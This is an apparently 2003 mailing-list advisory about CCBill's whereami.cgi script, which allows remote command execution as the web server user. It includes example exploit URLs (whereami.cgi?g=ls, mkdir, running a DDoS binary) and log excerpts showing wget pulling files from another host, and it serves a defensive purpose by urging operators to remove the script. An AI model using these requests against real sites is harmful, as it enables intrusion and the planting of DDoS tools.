The CGI script whereami.cgi that gets distributed by CCBill lacks input validation and in return allows for remote command execution as the web uid.
ce15f8d74362f11898352d1bbf86d0330e48248dd00ae31bec0febbb7a67da0c
Date: Thu, 03 Jul 2003 12:46:39 -0400
From: Dayne Jordan <djordan@completeweb.net>
Subject: Another overflow exploit for Apache? *RESOLVED*
Greetings again,
We found that this exploit was NOT a result of an Apache exploit.
After waiting for the culprits to attempt their mischeif again, we were
waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp
and executed thru Apache - not to our surprise, it appears CCBILL once
again has some very exploitable 'helper' scripts they upload when installing
their software.
On ALL the machines with the Ddos behavior we found, there was one common
script on all of them ' whereami.cgi '. This script, when executed from
the browser allows system commands to be entered and executed as the web
server. We even used wget and lynx thru this command interface to upload
various things into /tmp/. Our culprits were uploading old-school and common
Ddos binaries, then executing them.. nothing root worthy, but nonetheless
a pain in the arse.
Excerpt log entries from our test machines:
Machine getting it - how we uploaded a test binary:
216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls
HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls"
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
Machine serving it:
216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET /rogue-test.tar HTTP/1.0"
200 286720 "-" "Wget/1.5.1"
Other things we did with it:
216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET
/ccbill/whereami.cgi?g=mkdir%20/tmp/boo
HTTP/1.1" 200 247 "-" "Mozilla/4.0
(compatible; MSIE 5.5; Windows 98; H010818; T312461)"
and then...
su-2.02# ls -la /tmp
drwxrwxrwt 6 root wheel 3072 Jul 3 12:42 .
drwxr-xr-x 19 root wheel 512 Mar 17 17:01 ..
drwxr-xr-x 2 nobody wheel 512 Jul 3 12:44 boo
srwxrwxrwx 1 mysql wheel 0 Jul 3 00:05 mysql.sock
[snipped]
And snippet from one of the affected machines running 'hell' a simple
Ddos binary:
172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell
HTTP/1.1" 200 265 "-" "Mozilla/4.0
Once you initiate the /whereami.cgi?g=ls command from the browser, you then
get an input box and an enter button on your browser - execute any command
you like, including wget, lynx, tar, sh, etc etc.
This script is most likely used by CCBILL techs as part of their default
installation so that they can administer/setup their necessary scripts/software. Unfortunately,
there is a huge hole in this script. We have a customer who very
recently had CCBILL setup their services on his website and the very same
'whereami.cgi' exists even on this current date build.
So in short, those of you who use CCBILL make sure to remove or render
useless the 'whereami.cgi' script in your /ccbill directory(ies). Across
all our machines where we know CCBILL exists we've found this script on
every one so far - and removed it ;)
D.
=========